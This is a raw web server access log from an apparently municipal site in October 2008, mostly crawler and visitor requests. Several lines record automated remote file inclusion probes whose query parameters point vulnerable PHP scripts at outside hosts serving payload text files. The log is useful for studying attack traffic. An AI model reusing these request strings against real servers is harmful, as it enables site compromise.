64.41.133.39 - - [30/Oct/2008:05:39:05 -0700] "GET /index.php?cat=14 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:10 -0700] "GET /index.php?cat=20 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:39:11 -0700] "GET /robots.txt HTTP/1.1" 200 44 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:14 -0700] "GET /thumbnails.php?album=74 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:17 -0700] "GET /thumbnails.php?album=18 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
217.212.224.183 - - [30/Oct/2008:05:39:21 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.sancarloscity.org"
217.212.224.179 - - [30/Oct/2008:05:39:21 -0700] "GET /business/healthandfitness/ HTTP/1.0" 200 5819 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:22 -0700] "GET /thumbnails.php?album=41 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:39:24 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:25 -0700] "GET /thumbnails.php?album=26 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:27 -0700] "GET /thumbnails.php?album=16 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:30 -0700] "GET /thumbnails.php?album=28 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:32 -0700] "GET /thumbnails.php?album=25 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
82.102.10.26 - - [30/Oct/2008:05:39:40 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://membres.lycos.fr/scannerid/id.txt??? HTTP/1.1" 200 44270 "-" "libwww-perl/5.814" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:42 -0700] "GET /thumbnails.php?album=6 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.65.43 - - [30/Oct/2008:05:39:43 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:45 -0700] "GET /thumbnails.php?album=12 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:47 -0700] "GET /index.php?cat=9 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:51 -0700] "GET /index.php?cat=16 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:39:53 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:39:54 -0700] "GET /antenna.css HTTP/1.1" 200 1748 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:54 -0700] "GET /index.php?cat=4 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:39:54 -0700] "GET /autoactivate.js HTTP/1.1" 200 5474 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:55 -0700] "GET /index.php?cat=5 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
152.101.139.2 - - [30/Oct/2008:05:40:00 -0700] "GET /logs/access_081006.log/index1.php?=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 769 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
152.101.139.2 - - [30/Oct/2008:05:40:00 -0700] "GET /logs/index1.php?=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 764 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
152.101.139.2 - - [30/Oct/2008:05:40:00 -0700] "GET /index1.php?=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 759 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:40:00 -0700] "GET /index.php?cat=12 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:40:12 -0700] "GET /thumbnails.php?album=15 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.65.43 - - [30/Oct/2008:05:40:21 -0700] "GET /listings/listing/results.php?letter=u&category_id=709 HTTP/1.0" 200 25144 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:40:23 -0700] "GET /thumbnails.php?album=33 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.78.221 - - [30/Oct/2008:05:40:26 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:40:51 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61809 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:40:52 -0700] "GET /index.php?cat=11 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:40:58 -0700] "GET /thumbnails.php?album=11 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:41:00 -0700] "GET /index.php?cat=7 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:41:06 -0700] "GET /logs/access_080705.log//Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 783 "-" "libwww-perl/5.65" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:41:07 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 759 "-" "libwww-perl/5.65" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:41:07 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 765 "-" "libwww-perl/5.65" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:41:12 -0700] "GET /index.php?cat=10 HTTP/1.1" 404 758 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.78.221 - - [30/Oct/2008:05:41:13 -0700] "GET /picgallery/displayimage.php?album=28&pid=362&slideshow=5000 HTTP/1.0" 200 7015 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:41:13 -0700] "GET /jodera2/viewforum.php?f=1&sid=d52635a587b814e756bf820f508fadb7 HTTP/1.0" 200 84761 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:41:14 -0700] "GET /thumbnails.php?album=toprated&cat=0 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:41:19 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Search&CODE=getalluser&mid=13 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:41:22 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Search&CODE=getalluser&mid=14 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:41:23 -0700] "GET /thumbnails.php?album=favpics HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:41:26 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/event/results.php?category_id=5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:41:26 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Search&CODE=getalluser&mid=155 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
72.30.78.221 - - [30/Oct/2008:05:41:29 -0700] "GET /listings/listing/results.php?letter=r&category_id=726 HTTP/1.0" 200 25084 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:41:31 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=Search&f=9 HTTP/1.1" 200 7724 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:41:32 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 813 "-" "libwww-perl/5.810" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:41:32 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 824 "-" "libwww-perl/5.810" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:41:32 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 807 "-" "libwww-perl/5.810" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:41:35 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=calendar HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:41:40 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=home HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:41:43 -0700] "GET /logs/access_080928.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.810" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:41:43 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:41:44 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=idx HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:41:46 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "www.sancarloscity.org"
203.177.74.135 - - [30/Oct/2008:05:41:53 -0700] "GET /guestbook10.htm HTTP/1.1" 200 32466 "http://search.yahoo.com/search?ei=utf-8&fr=slv8-msgr&p=gena%20dayon&type=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GoogleT5; .NET CLR 2.0.50727)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:41:57 -0700] "GET /jodera2/index.php?sid=d52635a587b814e756bf820f508fadb7 HTTP/1.0" 200 55145 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:41:57 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=module&module=gallery HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:41:57 -0700] "GET /listings/promotion/ HTTP/1.1" 200 15950 "http://www.sancarloscity.org/listings/event/results.php?category_id=5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:42:06 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=post&do=new_post&f=9 HTTP/1.1" 200 7724 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:42:10 -0700] "GET /listings/promotion/ HTTP/1.1" 200 16050 "http://www.sancarloscity.org/listings/event/results.php?category_id=5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.78.221 - - [30/Oct/2008:05:42:11 -0700] "GET /listings/event/results.php?letter=c&category_id=8 HTTP/1.0" 200 10498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:42:11 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=post&do=reply_post&f=9&t=147 HTTP/1.1" 200 7727 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:42:12 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:42:13 -0700] "GET /logs/access_080705.log//Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 783 "-" "libwww-perl/5.65" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:42:13 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 759 "-" "libwww-perl/5.65" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:42:14 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 765 "-" "libwww-perl/5.65" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:42:23 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:23 -0700] "GET /listings/listing/results.php?category_id=699 HTTP/1.1" 200 31242 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:23 -0700] "GET /listings/layout/general_structure.css HTTP/1.1" 200 28444 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:24 -0700] "GET /listings/layout/general_noimage.css HTTP/1.1" 200 89 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:24 -0700] "GET /listings/layout/listing_result.css HTTP/1.1" 200 12330 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:24 -0700] "GET /listings/layout/listing_color.css HTTP/1.1" 200 4496 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:25 -0700] "GET /listings/layout/color/white_blue.css HTTP/1.1" 200 24170 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:25 -0700] "GET /listings/scripts/common.js HTTP/1.1" 200 5162 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:26 -0700] "GET /listings/scripts/location.js HTTP/1.1" 200 4102 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:27 -0700] "GET /listings/scripts/menusearch.js HTTP/1.1" 200 614 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:27 -0700] "GET /listings/scripts/contactclick.js HTTP/1.1" 200 1110 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:27 -0700] "GET /listings/scripts/cookies.js HTTP/1.1" 200 2224 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
121.170.11.100 - - [30/Oct/2008:05:42:27 -0700] "GET /logs/access_081003.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 797 "-" "libwww-perl/5.79" "www.sancarloscity.org"
121.170.11.100 - - [30/Oct/2008:05:42:28 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 774 "-" "libwww-perl/5.79" "www.sancarloscity.org"
121.170.11.100 - - [30/Oct/2008:05:42:28 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 779 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:42:36 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/event/results.php?category_id=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:42:39 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:42:43 -0700] "GET /listings/listing/results.php?letter=a&category_id=739 HTTP/1.1" 200 25109 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:42:44 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11446 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:56 -0700] "GET /frontbanner.swf HTTP/1.1" 200 547694 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:56 -0700] "GET /sampo/ HTTP/1.1" 200 2268 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:56 -0700] "GET /sampo/AC_RunActiveContent.js HTTP/1.1" 200 8029 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:42:57 -0700] "GET /sampo/Multichannel.swf HTTP/1.1" 200 70433 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:43:00 -0700] "GET /listings/listing/results.php?category_id=729 HTTP/1.1" 200 39897 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:43:00 -0700] "GET /sampo/xml/Dateline.xml HTTP/1.1" 200 73544 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:43:28 -0700] "GET /logs/access_080929.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.810" "www.sancarloscity.org"
